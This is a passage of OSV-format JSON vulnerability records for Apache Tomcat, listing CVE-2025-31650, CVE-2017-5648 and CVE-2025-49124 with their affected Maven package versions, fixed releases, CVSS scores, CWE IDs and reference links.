"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/01/14/1" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-706" ], "github_reviewed": true, "github_reviewed_at": "2021-04-06T21:27:31Z", "nvd_published_at": "2021-01-14T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3p2h-wqq4-wf4h", "published": "2025-04-28T21:30:43Z", "modified": "2025-11-03T23:18:32.629791Z", "aliases": [ "BIT-tomcat-2025-31650", "CVE-2025-31650" ], "related": [ "CGA-757w-cc53-956r", "CGA-rwp2-7vfm-8j2c" ], "summary": "Apache Tomcat Denial of Service via invalid HTTP priority header", "details": "Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException resulting in a denial of service.\n\nThis issue affects Apache Tomcat: from 9.0.76 through 9.0.102, from 10.1.10 through 10.1.39, from 11.0.0-M2 through 11.0.5. 
The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.90 through 8.5.100.\n\nUsers are recommended to upgrade to version 9.0.104, 10.1.40 or 11.0.6 which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.76" }, { "fixed": "9.0.104" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.102", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.10" }, { "fixed": "10.1.40" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.0", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", 
"11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.76" }, { "fixed": "9.0.104" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.102", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.10" }, { "fixed": "10.1.40" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", 
"ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.0", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31650" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/1eef1dc459c45f1e421d8bd25ef340fc1cc34edc" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/40ae788c2e64d018b4e58cd4210bb96434d0100d" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/75554da2fc5574862510ae6f0d7b3d78937f1d40" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8cc3b8fb3f2d8d4d6a757e014f19d1fafa948a60" }, { "type": "WEB", 
"url": "https://github.com/apache/tomcat/commit/b7674782679e1514a0d154166b1d04d38aaac4a9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b98e74f517b36929f4208506e5adad22cb767baa" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cba1a0fe1289ee7f5dd46c61c38d1e1ac5437bff" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ded0285b96b4d3f5560dfc8856ad5ec4a9b50ba9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f619e6a05029538886d5a9d987925d573b5bb8c2" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/j6zzk0y3yym9pzfzkq5vcyxzz0yzh826" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/04/28/2" } ], "database_specific": { "cwe_ids": [ "CWE-459", "CWE-460" ], "github_reviewed": true, "github_reviewed_at": "2025-04-29T14:59:22Z", "nvd_published_at": "2025-04-28T20:15:20Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3vx3-xf6q-r5xp", "published": "2022-05-13T01:25:13Z", "modified": "2024-04-18T17:16:06.618052Z", "aliases": [ "CVE-2017-5648" ], "summary": "Exposure of Resource to Wrong Sphere in Apache Tomcat", "details": "While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. 
When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.0.M18" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0.M17", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.13" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.2", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.0.42" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", 
"8.0.41", "8.0.5", "8.0.8", "8.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.0.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.76" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.75", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.0.M18" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0.M17", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", 
"purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.13" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.2", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.0.42" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.5", "8.0.8", "8.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.0.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.76" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", 
"7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.75", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3vx3-xf6q-r5xp/GHSA-3vx3-xf6q-r5xp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5648" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0f7b9465d594b9814e1853d1e3a6e3aa51a21610" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/6bb36dfdf6444efda074893dff493b9eb3648808" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/dfa40863421d7681fed893b4256666491887e38c" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/6d73b079c55ee25dea1bbd0556bb568a4247dacd" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d0e00f2e147a9e9b13a6829133092f349b2882bf6860397368a52600%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d0e00f2e147a9e9b13a6829133092f349b2882bf6860397368a52600@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201705-09" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180614-0001" }, { "type": "WEB", "url": "https://web.archive.org/web/20170417124117/http://www.securityfocus.com/bid/97530" }, { "type": "WEB", "url": "https://web.archive.org/web/20170420115120/http://www.securitytracker.com/id/1038220" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1809" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1802" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1801" }, { "type": "WEB", "url": "http://www.debian.org/security/2017/dsa-3842" }, { "type": "WEB", "url": "http://www.debian.org/security/2017/dsa-3843" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2020/07/20/8" } ], "database_specific": { "cwe_ids": [ "CWE-668" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T13:57:54Z", "nvd_published_at": "2017-04-17T16:59:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-42wg-hm62-jcwg", "published": "2025-06-16T15:32:28Z", "modified": "2025-10-29T16:13:33.340454Z", "aliases": [ "BIT-tomcat-2025-49124", "CVE-2025-49124" ], "summary": "Apache Tomcat installer for Windows has an untrusted search path vulnerability", "details": "Untrusted Search Path vulnerability in Apache Tomcat installer for Windows. 
During installation, the Tomcat installer for Windows used icacls.exe without specifying a full path.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0 through 10.1.41, from 9.0.23 through 9.0.105.\n\nUsers are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-42wg-hm62-jcwg/GHSA-42wg-hm62-jcwg.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.23" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": 